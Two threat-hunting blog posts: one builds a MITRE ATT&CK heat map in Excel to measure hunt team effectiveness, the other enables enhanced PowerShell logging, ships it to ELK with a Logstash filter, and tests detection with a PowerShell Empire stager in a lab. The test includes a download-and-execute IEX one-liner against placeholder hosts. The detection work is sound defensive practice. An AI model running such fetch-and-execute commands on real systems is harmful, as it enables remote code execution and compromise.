
Monday, July 17, 2017

How Hot Is Your Hunt Team?



The idea of Threat Hunting in an organization can no longer be dismissed. No matter how mature your organization is regarding this concept, you are probably already doing some type of hunting. However, how do you show the effectiveness of your hunting engagements? How do you show your senior leadership the progress of your hunt team? A common misconception is that this can be done only by tracking the number of incidents uncovered during hunting campaigns. In my opinion, it is also important to consider whether the right data is being collected, whether automation is being improved, and how much the team knows about its own environment when hunting for specific adversary techniques (you can change this and create your own metrics; this is just my opinion).


In this post, I will use the MITRE ATT&CK framework in the form of a heat map in order to measure the effectiveness of a Hunt Team. I will use Excel (VLOOKUP formulas and Conditional Formatting) and the MITRE ATT&CK matrix structure to show you how to build your own heat map and start measuring the effectiveness of your hunt team for free.



Heat Map Goals:


  • Provide transparency to senior leadership on threat hunting strengths and weaknesses
  • Perform a gap analysis to demonstrate where resources are needed in your environment
  • Emphasize the effectiveness of collaboration with other teams (in order to reach a Very Good or Excellent score, you might need to work with other teams to fill the gaps)
  • Prioritize techniques based on the most crucial gaps identified


MITRE ATT&CK Framework



ATT&CK is a model and framework for describing the actions an adversary takes while operating within an enterprise network. The model can be used to better characterize post compromise adversary behavior with the goal of distilling common behaviors across known intrusion activity into individual or combinations of actions that an adversary may take to achieve their goals. The TTPs described in ATT&CK were selected based on observed APT intrusions from public reporting, and are included in the model at a level of abstraction necessary for effectively prioritizing defensive investments and comparing endpoint intrusion detection capabilities. [Source]





Get your own ATT&CK Matrix in Excel




Copy the MITRE ATT&CK Matrix




  • Open Excel and create a new blank workbook
  • Go to the MITRE ATT&CK techniques page and highlight the whole Matrix table
  • Copy (CTRL + C) the highlighted table (make sure you highlight the whole table) and paste it into the first cell (A1 or R1C1) of your new blank workbook as shown in figures 1 and 2 below. Even though you paste it on the first row, it lands starting on the second one, so just delete the first row.

Figure 1: Copying MITRE ATT&CK Matrix




Figure 2: Copying Matrix to Excel




Edit your Matrix Table


Remove hyperlinks from the whole table at once as shown in figure 3 below. Your table might not have borders anymore, so just highlight the whole table and add borders to it as shown in figures 4, 5 and 6 below.


Figure 3: Remove Hyperlinks




Figure 4: Table without Hyperlinks



Figure 5: Add "All Borders" to your table



Figure 6: Plain MITRE Matrix table



Once you have everything as a table again, you will notice that several cells have long text that needs to be wrapped into several lines to fit better. Highlight your table again and use the "Wrap Text" option as shown in figure 7 below. 


Figure 7: Wrapping up long-text




Now, the table should be ready to be used for our heat map. Add colors to your header, adjust the font size, etc. Save your document and give your worksheet a name. I named mine "HeatMap" as shown in figure 8 below.


Figure 8: Matrix Ready for our Heat Map 




UPDATE  09/10/2017: Get your own ATT&CK Matrix in Excel


  • I developed a PowerShell script that I named Invoke-ATTACKAPI which leverages the MITRE ATTACK API to interact directly with the MITRE ATTACK framework and pull valuable information all at once.
  • I use this script now to update my ATTACK Enterprise Matrix
  • All you need to do is run the following command to get the same results as above:
Invoke-ATTACKAPI -Matrix | select Persistence, 'Privilege Escalation', 'Defense Evasion','Credential Access',
Discovery, 'Lateral Movement', Execution, Collection, Exfiltration, 'Command and Control' | 
Export-Csv C:\documents\matrix.csv -NoTypeInformation
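Note that Invoke-ATTACKAPI is a function, so it needs to be loaded into your PowerShell session before you can run the command above. A minimal sketch, assuming you cloned the repository to a local folder and that the script file is named Invoke-ATTACKAPI.ps1 (adjust the path to your own copy):

# Hypothetical local path - point it to wherever you cloned the Invoke-ATTACKAPI repository
cd C:\tools\Invoke-ATTACKAPI
. .\Invoke-ATTACKAPI.ps1   # dot-source the script to load the Invoke-ATTACKAPI function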



Define Your Scoring System


You need to define your scoring system and set the specific criteria you would like to use to measure how effective your team is at detecting specific adversary techniques.

A few basic steps:
  • You can start by setting your rating system levels (None, Poor, Fair, Good, Very Good & Excellent). 
  • You can then assign a color to each score (Keep in mind you are creating a heat map). 
  • Map a number to each level (0,1,2..5) as shown in figure 9 below.
  • Finally assign key focus points for each level. One example could be what I show in figure 9 below.
As I mentioned at the beginning of this post, tracking how many incidents get uncovered during a hunting campaign should not be the ONLY indicator of an effective hunt team. Why? What if you do not find anything? Does that mean that your team is not good? In my opinion, validating the detection of a specific adversary technique by focusing on having the right data, improving the automation of hunting procedures, and knowing your environment should also be considered when determining the effectiveness of a hunt team. For example, you can focus on the following key points (this is a basic example; I recommend you come up with your own):

  • None
    • Not enough data to detect a specific adversary technique (i.e. hunting with only Windows Security event logs when looking for PowerShell activity). Also, not centralizing the data needed to hunt across the whole enterprise.
  • Poor
    • Sending all your logs to a central repository (consider Splunk, ELK, etc.). If you are "hunting" on one endpoint at a time, you are NOT being effective at all!
    • Creating basic signatures or correlation rules to detect specific activity. Usually this is done by correlating two to three events. This is also where you might have Threat Intel feeds helping your routine hunts (IOC sweeps).
    • Running queries and trying to make sense of the data without automating certain hunting procedures that could make your hunt more effective and efficient (i.e. after running a few queries in your SIEM, you might still have hundreds or thousands of events that you need to go through and maybe correlate with other events to find outliers).
  • Fair
    • Collecting the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique. This is where you start adding Sysmon logs, ETW, PowerShell logs, netflow, etc. Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet. Hunters might be running queries and still getting a very high number of events that need to be filtered down before they can be analyzed.
  • Good
    • Correlating and integrating numerous data types across all your endpoints in order to filter out noise and potential false positives. This is where you start using a few basic data science techniques in order to make sense of all the data in your central repository (better automation).
  • Very Good
    • Leveraging more than just simple outlier detection techniques. This is where your team starts using advanced data science techniques to detect the known and the unknown. (Of course, data science concepts such as Machine Learning cannot be applied to every single use case or technique that you are trying to detect; if you can validate the detection of an adversary technique by just applying basic data science techniques, then you might already be at the "Very Good" level.)
  • Excellent
    • This is where your team is proficient at everything above and very effective at detecting adversary techniques, but also has a very good understanding of the environment (beyond just having the right automation and data; if you do not understand exactly how certain activity relates to your environment, you might be missing things).

Remember that the table below needs to be created on a new sheet in the same workbook where you created your ATT&CK Matrix (I named mine "Score Defs").


Figure 9: Basic Scoring System table





Define each Adversary Technique


Set your own "All Techniques" Page


  • Go to the MITRE ATT&CK "All Techniques" page and highlight the whole table (the same way you did with the matrix earlier)
  • Copy (CTRL + C) the highlighted table (make sure you highlight the whole table) and paste it into the first cell (A1 or R1C1) of a new sheet in the same workbook.
  • You will basically have to make the same adjustments you made to the MITRE ATT&CK matrix (wrap text, font size, All Borders, remove hyperlinks, etc.).
  • Make sure you go over the whole table and adjust any parts that might not have copied properly.


Figure 10: "All Techniques" Page



Once you have a table with everything from the "All Techniques" page, then you will have to add a few columns to add more context to it and integrate it with your Heat Map. 
  • I added two columns, one named "Detection Approach" and another one named "Data Sources". On the MITRE ATT&CK "All Techniques" page, I clicked on every single technique and grabbed the detection approach and the data sources needed to help detect that specific technique.
  • I also added another column named "Detection Score". Here you will have to review each technique with your team and give it a score following your "Score Defs" sheet (None, Poor, Fair, Good, Very Good, Excellent).
  • Finally, I added a column named "Tools". I use this to identify which of my current tools would help me hunt for a specific adversary technique. This is also very helpful to show vendors how much they are contributing to your detection/hunting capabilities (vendors selling you EDR, maybe?).


Figure 11: All Techniques Table



UPDATE  09/10/2017: Define each adversary technique

  • I developed a PowerShell script that I named Invoke-ATTACKAPI which leverages the MITRE ATTACK API to interact directly with the MITRE ATTACK framework and pull valuable information all at once.
  • I use this script now to update my adversary technique sheet
  • All you need to do is run the following command to get the same results as above, before adding the 'Detection Score' and 'Tools' columns:
Invoke-ATTACKAPI -Category -Technique | select @{Name="Name"; Expression={$_.Name -join ","}},
@{Name="Tactic"; Expression={$_.Tactic -join ","}}, @{Name="ID"; Expression={$_.ID -join ","}},
@{Name="Description"; Expression={$_.Description -join ","}},
@{Name="Analytic details"; Expression={$_.'Analytic Details' -join ","}},
@{Name="Data Source"; Expression={$_.'Data Source' -join ","}} |
Export-Csv F:\wardog\scripts\techniques.csv -NoTypeInformation



Set a Detection Score Drop-Down List


I added a "Detection Score" column and was able to assign a score to each technique. What if we want to change the score? Do we delete the text and type it again?. I recommend to use n Excel feature named "Data Validation" under the "Data" tab. This limits the type of data that can be entered in a cell. This will help us to have a drop-down menu to pick from the 6 different levels of the rating system.

  • Highlight all your "Detection Score" cells, click on the tab named "Data", and then click "Data Validation" as shown in figure 12 below.
  • A window will pop up where you select "List" as the validation criteria and then provide the list of values you want to use in your drop-down menu (figure 13).
  • Click inside the "Source" box and then click on the "Score Defs" sheet. Highlight the six levels (None, Poor, Fair, Good, Very Good, Excellent) and click OK as shown in figure 14 below.
  • You will now be able to click any cell under the "Detection Score" column and pick one of the 6 options from the drop-down arrow at its right edge, as shown in figure 15 below.



Figure 12: Highlighting "Detection Score" cells




Figure 13: Selecting a Source list




Figure 14: Getting values from the Score Defs sheet




Figure 15: Drop-Down list enabled on Detection Score cells.






Integrate All the Sheets



Heat Map Sheet: Add Scoring Columns


Add a blank column to the right of each tactical group as shown in figure 16 below. This is where you will sync the score you set for each technique in the "Detailed Techniques" sheet.



Figure 16: Adding extra columns to the Heat Map.





Heat Map Sheet: VLOOKUPS


If your Excel version shows your columns as numbers instead of letters, then you have the R1C1 reference style option enabled. If you are not comfortable with the R1C1 reference style, you can disable that feature by going to File > Options > Formulas, un-checking the R1C1 reference style option, and clicking OK as shown in figure 17 below.



Figure 17: Disable R1C1 Reference Style




Now you should be good to start setting up your VLOOKUP formulas. First, highlight the cell to the right of the first Persistence technique ("Accessibility Features").

Copy the text below into the Formula bar as shown in figure 18:

=VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0)

  • A2 is the cell to the left of the cell you highlighted (the adversary technique). That is the value we are going to look for first.
  • 'Detailed Techniques'!A:G,7,0
    • The first value in quotes is the name of the sheet where you will look up the value found in cell A2.
    • A:G is the table range.
    • The second value after the comma (7) is the number of the "Detection Score" column, from which we will collect the score value for the specific adversary technique we were looking for (A2 = Accessibility Features).
    • The last value after the last comma (0) and before the ")" basically says "match the exact value" I am looking for (no fuzzy matching).
  • 'Score Defs'!A:B,2,0
    • The first value in quotes again just points to the "Score Defs" sheet, where you will now look for the score string retrieved from the "Detailed Techniques" sheet.
    • The second value after the first comma (2) is the number of the "Integer Mapping" column, from which we will collect the value (number) mapped to the specific score level (None, Poor, Fair, Good, Very Good or Excellent).
    • The last value after the last comma (0) and before the ")" basically says "match the exact value" I am looking for (no fuzzy matching).

As you can see below, after entering the formula above, I got a value of zero, which means that I set the score for Accessibility Features to "None" (no data available for that technique).



Figure 18: Double VLOOKUP to get a score value for each technique




Now, in order to test your formula with the other techniques in the same column, select the cell with the number "0" and drag its bottom right corner down to apply the same formula to all the cells below, as you can see in figure 19 below.


Figure 19: Double VLOOKUP to get a score value for each technique




There will be cells that are just blank, and in order to not get any error messages, we just have to add a conditional to the formula. Replace the first formula with the following:

=IF(ISNA(VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0)),"",VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0))
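If your version of Excel supports IFERROR (Excel 2007 and later), a shorter equivalent is the sketch below; it returns an empty string for any lookup error instead of testing only for #N/A:

=IFERROR(VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!A:G,7,0),'Score Defs'!A:B,2,0),"")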



Figure 20: Double VLOOKUP with IF conditional to show empty cells where there are no techniques.





Heat Map: Locking Cell Values in Formula


Next, we have to copy the same formula to the other columns, and we want to make sure that the table ranges pointing to our "Score Defs" and "Detailed Techniques" sheets stay the same. The only reference that should change is the technique cell to the left of each formula. You can lock parts of your formula by doing the following:

  • Click on the cell where you created the first formula (B2)
  • Place your cursor on the table range of each sheet reference in the formula and press F4
  • You will see the table range values with Dollar Signs next to their parameters as shown in figure 21 below.



Figure 21: Lock cell values



Then, copy the cell to the right of "Accessibility Features" under Persistence, and paste it into the scoring column next to the first technique of every other tactic. Then, drag the bottom right corner of each cell with the formula down to the last technique of each column, as shown in figure 22 below. You will see that every single technique now has a value associated with its rating level.



Figure 22: All the values from the Detailed techniques and Score Defs are synced





Add Colors to your Heat Map


Get your RGB Color Values


First, get the RGB values of all your rating levels. You can do that by going to your "Score Defs" sheet, clicking on each rating cell, and checking the "More Colors" settings of its fill color as shown in figure 23 below. Do the same for every single color. Let me share my RGB values in case you want to use mine:

0 = RGB 255 79 79
1 = RGB 255 119 87
2 = RGB 255 174 93
3 = RGB 242 245 123
4 = RGB 209 220 255
5 = RGB 125 156 255



Figure 23:  RGB Value of Poor/1.





Conditional Formatting: Creating Rules


Once you have all your RGB values written down, go to your "HeatMap"  sheet and highlight the whole table. Do the following:

  • Click on Conditional Formatting > New Rule as shown in figure 24 below
  • Select "Use a formula to determine which cells to format"  (Figure 25)
  • In the "Format values where this formula is true", type: =B2=1  (Figure 26)
  • Click on Format > More Colors> and set the RGB value for the Rate Poor=1.
  • Click OK> OK > OK (Figure 27)
  • You should now see all the techniques where the effectiveness of the hunt team was set to 1 highlighted in orange, as shown in figure 28




Figure 24:  Creating a new rule.




Figure 25:  Setting the rule type.




Figure 26:  Set the values where the formula is true.




Figure 27:  Setting the RGB value..





Figure 28:  Poor values.




Next, create the rest of the rules for the rating values 2, 3, 4, 5, 0 and "" (BLANK). Yes, you have to create a BLANK rule at the end. Make the "" rule the last one you create and set its format to "No Color" (since it is created last, it should show up as the first rule at the top of the list). That rule should look something like this: =B2="" .
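The formulas for the remaining rules follow the same pattern (assuming B2 is still the top-left scoring cell of the range you highlighted):

=B2=0
=B2=2
=B2=3
=B2=4
=B2=5
=B2=""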

Once you have all the rules in place, your heat map should look like this:



Figure 29:  Your First Heat Map.





Bonus: Effectiveness Trend


You can add up all the values per tactical group, get the average, and show a chart summarizing how effective your hunt team is per tactical group and per quarter (your boss will love this).
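As a minimal sketch, assuming the Persistence scores live in column B of the "HeatMap" sheet between rows 2 and 60 (adjust the range to match your own table), the per-tactic average could be calculated with:

=AVERAGE(HeatMap!B2:B60)

AVERAGE ignores the blank ("") cells produced by the scoring formula, so only techniques that actually have a score contribute to the trend.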



Figure 30: Effectiveness Trend Over Time.





Test your Heat Map: Take Care of the Basics


Let's say you start sending all your native Windows event logs to a central repository and start collecting Sysmon logs too. You will see techniques going from None to Poor or Fair (this is just an example). Remember that even though you might now have some extra visibility, you would still have to go through a lot of data and analyze several events if you do not improve the automation of certain hunting procedures. Several adversary techniques require more than just a simple correlation rule or signature. Also, we are measuring the effectiveness of the Hunt Team and not just how many incidents get uncovered during a hunting campaign.



Figure 31: Heat Map update





Final Thoughts


I hope this was helpful for those teams that would like to get an idea of how effective their hunting is. This is one of many ways you can put metrics behind your hunting campaigns.

For those that would like to just download the template and start using it right away, you can find it in the metrics folder of the ThreatHunter-Playbook:

URL: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/blob/master/metrics/HuntTeam_HeatMap.xlsx


If you would like to contribute to the ThreatHunter-Playbook, just send a PR!



Feedback is greatly appreciated! Thank you.


Wednesday, June 28, 2017

Enabling Enhanced PowerShell logging & Shipping Logs to an ELK Stack for Threat Hunting


A couple of weeks ago, I was asked how useful enabling enhanced PowerShell logging is for a Threat Hunter and how easy it is to ship its logs to an ELK stack for analysis. First, when I say enhanced PowerShell logging, I mean enabling Module and Script Block Logging. Those two enhancements started with Windows Management Framework (WMF) versions 4.0 and 5.0 and are very useful for logging PowerShell pipeline execution details and all blocks of PowerShell code as they get executed (helpful against encoded and obfuscated scripts). Several experts have already explained the benefits of these enhancements in more detail, but only a few have shown detailed steps for the implementation, consumption and analysis of the logs.

In this post, I will show you how you can enable enhanced PowerShell logging in your lab environment, create a Logstash Filter for it, and integrate it with other logs to improve your endpoint visibility while hunting for adversaries leveraging PowerShell (not just powershell.exe) during post-exploitation. 



Requirements:





PowerShell 5.0 (WMF 5.0 RTM) Installation


Install the latest Windows updates before installing WMF 5.0 RTM. You can install WMF 5.0 RTM only on the following operating systems:[Source]


Supported operating systems and prerequisites:

  • Windows Server 2012 R2
  • Windows Server 2012
  • Windows Server 2008 R2 SP1 (all editions except IA64; requires WMF 4.0 and .NET Framework 4.5 or above)
  • Windows 8.1 (Pro, Enterprise editions)
  • Windows 7 SP1 (all editions; requires WMF 4.0 and .NET Framework 4.5 or above)

The package link for each OS corresponds to the MSU file named in the installation commands below.




To install WMF 5.0 from Windows Explorer (or File Explorer): [Source]


  1. Navigate to the folder into which you downloaded the MSU file.
  2. Double-click the MSU to run it.

To install WMF 5.0 from Command Prompt: [Source]


  1. After downloading the correct package for your computer's architecture, open a Command Prompt window with elevated user rights (Run as Administrator). On the Server Core installation options of Windows Server 2012 R2 or Windows Server 2012 or Windows Server 2008 R2 SP1, Command Prompt opens with elevated user rights by default.
  2. Change directories to the folder into which you have downloaded or copied the WMF 5.0 installation package.
  3. Run one of the following commands:
    • On computers that are running Windows Server 2012 R2 or Windows 8.1 x64, run Win8.1AndW2K12R2-KB3134758-x64.msu /quiet.
    • On computers that are running Windows Server 2012, run W2K12-KB3134759-x64.msu /quiet.
    • On computers that are running Windows Server 2008 R2 SP1 or Windows 7 SP1 x64, run Win7AndW2K8R2-KB3134760-x64.msu /quiet.
    • On computers that are running Windows 8.1 x86, run Win8.1-KB3134758-x86.msu /quiet.
    • On computers that are running Windows 7 SP1 x86, run Win7-KB3134760-x86.msu /quiet.




Script Block Logging


PowerShell v5 and KB 3000850 introduce deep script block logging. When you enable script block logging, PowerShell records the content of all script blocks that it processes. If a script block uses dynamic code generation (i.e.: $command = "'Hello World'"; Invoke-Expression $command), PowerShell will log the invocation of this generated script block as well. This provides complete insight into the script-based activity on a system, including scripts or applications that leverage dynamic code generation in an attempt to evade detection. [Source] Script Block logging events are written to Event ID (EID) 4104.



Module Logging


Module logging records pipeline execution details as PowerShell executes, including variable initialization and command invocations. Module logging will record portions of scripts, some de-obfuscated code, and some data formatted for output. This logging will capture some details missed by other PowerShell logging sources, though it may not reliably capture the commands executed. Module logging has been available since PowerShell 3.0. Module logging events are written to Event ID (EID) 4103. [Source]



Turn On Enhanced PS Logging Via GPO Settings


Create & Edit a New GPO


If you have a domain controller set up in your environment with AD services enabled, you can create Audit Policies and apply them to your whole domain. If you don't know how to create a custom Audit Policy in your environment, you can learn about it from one of my posts here, starting at "Figure 59. Creating a new GPO", to get familiar with GPOs. Create and edit a GPO by doing the following, as shown in figures 1-4 below:



Figure 1: Creating new GPO


Figure 2: Naming GPO



Figure 3: GPO created



Figure 4: Edit new GPO




Browse to "Windows PowerShell" Settings


In Group Policy Management Editor, browse to Computer configuration > Administrative Templates: Policy Definitions > Windows Components > Windows PowerShell as shown in figures 5-6 below


Figure 5: Browsing to Windows PowerShell settings



Figure 6: Browsing to Windows PowerShell settings




Turn On Module Logging


  • Right click on "Turn on Module Logging", select Edit,  and check the "Enabled" option
  • Once you select Enabled, the "Show" option next to "Module Names" will become available.
  • Click on "Show" and a Show Content window will pop up
  • Click on value and add an "*" in order to log all PowerShell modules
  • Click OK on the "Show Content Window" to exit out of it
  • Click Apply and OK


Figure 7: Turning on Module Logging



Figure 8: Turning on Module Logging



Figure 9: Turning on Module Logging



Figure 10: Turning on Module Logging



Figure 11: Setting * as a value to log all PowerShell modules




Turn on Script Block Logging


  • Right click on "Turn on PowerShell Script Block Logging" and select Edit
  • Check the "Enabled" option
  • [optional] Check "log script invocation start/stop" options
  • Click on Apply and OK

Figure 12: Turning on Script Block Logging



Figure 13: Turning on Script Block Logging



Figure 14: Enhanced PowerShell logging with Module and Script Block logging enabled
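If you are working on a standalone lab VM that is not joined to a domain, you can write the same policy values directly to the registry instead of using a GPO. This is just a minimal sketch of the policy keys that the two GPO settings above populate; run it from an elevated PowerShell session:

# Policy keys used by "Turn on Module Logging" and "Turn on PowerShell Script Block Logging"
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module Logging: enable it and log all modules (*)
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging" -Name 'EnableModuleLogging' -Value 1 -Type DWord
Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String

# Script Block Logging: enable it
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord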




Link the new GPO to your Domain


  • Go back to your Group Policy Management and right click on your Domain name
  • Select Link an Existing GPO
  • Select your PowerShell one and click OK


Figure 15: Linking new GPO to Domain



Figure 16: Linking new GPO to Domain



Figure 17: Linking new GPO to Domain




Force Group Policy updates on your victim VMs
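If you do not want to wait for the normal Group Policy refresh interval, you can force the update yourself from an elevated command prompt or PowerShell session on each victim VM:

gpupdate /force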



Figure 18: Forcing GP updates





Testing Enhanced PowerShell


Run a simple PowerShell Command


Open PowerShell and type the following:

(new-object System.Net.WebClient).DownloadFile("https://cyberwardog.blogspot.com", "test.txt")

Check your events in Event Viewer and you should be able to see, for example, a 4103 event showing the module that was used in your basic command (System.Net.WebClient).
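If you prefer the console over Event Viewer, a quick sketch to pull the most recent enhanced PowerShell logging events from the Operational log:

# Grab the 10 most recent Module (4103) and Script Block (4104) logging events
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103, 4104 } -MaxEvents 10 |
    Format-List TimeCreated, Id, Message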


Figure 19: Testing PowerShell logging



Figure 20: Testing PowerShell logging




Ship PowerShell logs to your ELK


Up to this point, we can tell that our enhanced PS logging works. Now it is time to ship the logs to our central repository (ELK stack). If you have not set up your ELK stack yet, I recommend following the steps posted here. If you have not set up your log shipper yet either, you can learn how to do it by following the steps posted here (starting at Figure 9). Once you have all that set up, just open your Winlogbeat configuration as Administrator with Notepad and add the following under your winlogbeat.event_logs section as shown in figure 21:

- name: Microsoft-Windows-PowerShell/Operational
  event_id: 4103, 4104

Save your changes and restart your Winlogbeat service. (I have my Winlogbeat config also sending Sysmon logs; if you do not have Sysmon installed, do not add that part to your config.)
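If you installed Winlogbeat as a Windows service (the service is usually named winlogbeat; adjust the name if yours differs), you can restart it from an elevated PowerShell session:

Restart-Service -Name winlogbeat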


Figure 21: Adding PowerShell logs to your Winlogbeat config




Why do we need a Logstash Filter?


We can tell that our enhanced PS logging works, and we are good to start sending our logs to a central repository (ELK stack). However, if we take a look at how the data is shipped to our ELK stack, especially EID 4103, we can see that our event data is split into two fields, [event_data][Payload] and [event_data][ContextInfo], as shown in figure 22 below.

Now, [event_data][Payload] should give us our module information, but Payload holds everything as one long string, which is then stored as a long string in Elasticsearch without creating extra fields. The JSON representation in figure 22 shows what I am talking about.
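To give you an idea of what the filter below has to deal with, the Payload value of a 4103 event is roughly of the following form (an illustrative sketch rather than an exact log excerpt), with CommandInvocation and ParameterBinding lines packed into a single string:

CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="TypeName"; value="System.Net.WebClient"

That is why we need a Logstash filter to split it into separate, searchable fields.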


Figure 22: EID 4103 JSON




Creating a Logstash Filter [UPDATED]


UPDATE 07/06/2017
Thanks to Nate Guagenti (@neu5ron), the initial filter configuration went from a basic/simple one to a much more advanced config. Thank you very much for your help, Nate!!

Log on to your ELK server and type the following:

sudo nano /etc/logstash/conf.d/10-powershell-filter.conf

The command above should create a new logstash filter. You can name it whatever you want. Then, copy and paste the following:


filter {
  if [source_name] == "Microsoft-Windows-PowerShell" {
    if [event_id] == 4103 {
      mutate {
        add_field => [ "PayloadInvocation", "%{[event_data][Payload]}" ]
        add_field => [ "PayloadParams", "%{[event_data][Payload]}" ]
        gsub => [
          "[event_data][ContextInfo]", "      ", "",
          "[event_data][ContextInfo]", " = ", "="
        ]
      }
      mutate {
        gsub => [
          "PayloadInvocation", "CommandInvocation\(.*\)", "commandinvocation",
          "PayloadInvocation", "ParameterBinding.*\r\n", "",
          "PayloadParams", "parameterbinding\(.*\)", "parameterbinding",
          "PayloadParams", "CommandInvocation.*\r\n", "",
          "[event_data][Payload]", "CommandInvocation.*\r\n", "",
          "[event_data][Payload]", "ParameterBinding.*\r\n", ""
        ]
        rename => { "[event_data][Payload]" => "[powershell][payload]" }
      }
      kv {
        source => "PayloadInvocation"
        field_split => "\n"
        value_split => ":"
        allow_duplicate_values => false
        target => "[powershell]"
        include_keys => [ "commandinvocation" ]
      }
      kv {
        source => "PayloadParams"
        value_split => "="
        allow_duplicate_values => false
        target => "[powershell][param]"
        include_keys => [ "name", "value" ]
      }
      kv {
        source => "[event_data][ContextInfo]"
        field_split => "\r\n"
        value_split => "="
        remove_char_key => " "
        allow_duplicate_values => false
        include_keys => [ "Severity", "HostName", "HostVersion", "HostID", "HostApplication", "EngineVersion", "RunspaceID", "PipelineID", "CommandName", "CommandType", "ScriptName", "CommandPath", "SequenceNumber", "ConnectedUser", "ShellID" ]
      }
      mutate {
        rename => { "CommandName" => "[powershell][command][name]" } 
        rename => { "CommandPath" => "[powershell][command][path]" }
        rename => { "CommandType" => "[powershell][command][type]" }
        rename => { "ConnectedUser" => "[powershell][connected][user]" }
        rename => { "EngineVersion" => "[powershell][engine][version]" }
        rename => { "HostApplication" => "[powershell][host][application]" }
        rename => { "HostID" => "[powershell][host][id]" }
        rename => { "HostName" => "[powershell][host][name]" }
        rename => { "HostVersion" => "[powershell][host][version]" }
        rename => { "PipelineID" => "[powershell][pipeline][id]" }
        rename => { "RunspaceID" => "[powershell][runspace][id]" }
        rename => { "Scriptname" => "[powershell][scriptname]" }
        rename => { "SequenceNumber" => "[powershell][sequence][number]" }
        rename => { "ShellID" => "[powershell][shell][id]" }
        remove_field => [
          "Severity",
          "EventType",
          "Keywords",
          "message",
          "Opcode",
          "PayloadInvocation",
          "PayloadParams",
          "[event_data][Payload]",
          "[event_data][ContextInfo]"
        ]
        convert => { "[powershell][pipeline][id]" => "integer" }
        convert => { "[powershell][sequence][number]" => "integer" }
      }
    }
    if [event_id] == 4104 {
      mutate {
        rename => { "[event_data][MessageNumber]" => "[powershell][message][number]" }
        rename => { "[event_data][MessageTotal]" => "[powershell][message][total]" }
        rename => { "[event_data][ScriptBlockId]" => "[powershell][scriptblock][id]" }
        rename => { "[event_data][ScriptBlockText]" => "[powershell][scriptblock][text]" }
        remove_field => [ "message" ]
        convert => { "[powershell][message][number]" => "integer" }
        convert => { "[powershell][message][total]" => "integer" }
        convert => { "[powershell][scriptblock][id]" => "integer" }
        
      }    
    }
  }
}

You can also find this PowerShell config here

Figure 23: Part of the Logstash PowerShell Filter



Restart your Logstash service as shown in figure 24 below, and monitor your Logstash logs to make sure everything runs smoothly. If you encounter an error, check your configuration and restart your Logstash service again.
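As a reference, a minimal sketch of those two steps, assuming your ELK server runs Logstash as a systemd service (adjust the service name and log path to your install):

sudo systemctl restart logstash
sudo tail -f /var/log/logstash/logstash-plain.log   # watch for configuration errors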


Figure 24: Restart Logstash service




Visualize Logstash Changes


Browse to your Kibana IP, and if you repeat the basic command you executed to test your PS logging, you should now be able to see three new extra fields that you can add as columns when visualizing your 4103 logs.


Figure 25: Visualize Logstash changes




If you notice that the fields related to your PowerShell logs (even your new custom fields) have a "?" to the left of the field name and a yellow triangle as shown in figure 26 below, that is because you need to refresh your field list in your ELK stack. Go to Management and refresh your field list as shown in figures 27-28 below.


Figure 26: Visualize Logstash changes




Figure 27: Refresh Field list




Figure 28: Refresh Field list




Figure 29: Refresh Field list





TimeLine View


You should now be able to see how useful it is to have the data parsed properly when you put the events in a timeline view, as shown in figure 30 below.


Figure 30: Timeline style




PS Logging as part of a 360 view (Dashboard)


You could also add the custom fields and the enhanced PS logging fields to a dashboard to improve the 360 view of your environment. This is very useful for monitoring PowerShell activity in your environment from a more detailed perspective.


Figure 31: 360 view of your environment with PS Logging implemented




Ready to test a PS Empire Stager?


Listener and Stager Ready



Figure 32: Listener Ready



Figure 32: Stager Ready




Start a Pythonic Web server hosting your stager script



Figure 33: Web server ready.




Download & Execute Stager


Go to your victim's computer, and open PowerShell. Type the command below:

IEX (New-Object System.Net.WebClient).DownloadString("http://<Your Web Server>:<port>/<stager script>"); .\<stager script>


Figure 34: Downloading and executing stager




Take a look at your Dashboard


Right away, if you look at the top right of your dashboard, you will start seeing some interesting events (command invocation, param values, and ScriptBlockText). Make sure you add a filter to only look at logs from the victim's computer.


Figure 35: Dashboard view after execution of stager




TimeLine View


You can see that the Script Block Text field captured the initial command used to download and execute the stager. Remember the column names so that you can follow along with several of the images below where I could not show the column headers.


Figure 36: First ScriptBlockText event




Then, I can see the Command "new-object" being invoked and "System.Net.WebClient" being used


Figure 37: First 4103 event




Also, pay attention to the combination of events in figure 38 below. You can see Windows event 4688 (Process Creation), 4104 (Script Block Logging) and Sysmon EID 1 (Process Creation). This is the ONLY time that you will see all those events capturing the initial execution of the stager on the victim's computer. From this point on, nothing gets executed from disk, so you will not have 4688s or Sysmon EID 1s tracking the rest of the scripts/commands being executed on the victim's computer. However, you will keep seeing 4103 and 4104 events capturing the rest of the PowerShell activity.


Figure 38: Capturing initial execution of stager




Now, you might be asking yourself why the Script Block Text field shows encoded strings instead of decoded ones. Take a look at figures 39 and 40 below. Script Block logging captures both states.


Figure 39: Decoded Stage



Figure 40: Decoded Stage




More indicators.....


Figure 41: More indicators



We can see information being gathered from the system via WMI, as shown in figure 42 below.


Figure 42: WMI to gather information about the compromised system




Finally, our Beaconing pattern from a host perspective :) Very useful!


Figure 43: Beaconing pattern from a powershell perspective





Final Thoughts


I hope this post was helpful to those that were not familiar with the benefits of enhanced PowerShell logging and with the process of implementing it in their environment. In my next posts, I will use this same approach and the new logging capabilities to document patterns and events created by several post-exploitation techniques available in PowerShell Empire.

If you would like to contribute and document adversary patterns/behaviors captured by event logs (Windows, Sysmon, PowerShell, etc.), feel free to follow the Template and submit a PR to the ThreatHunter-Playbook (a threat hunter's playbook to aid the development of techniques and hypotheses for hunting campaigns).


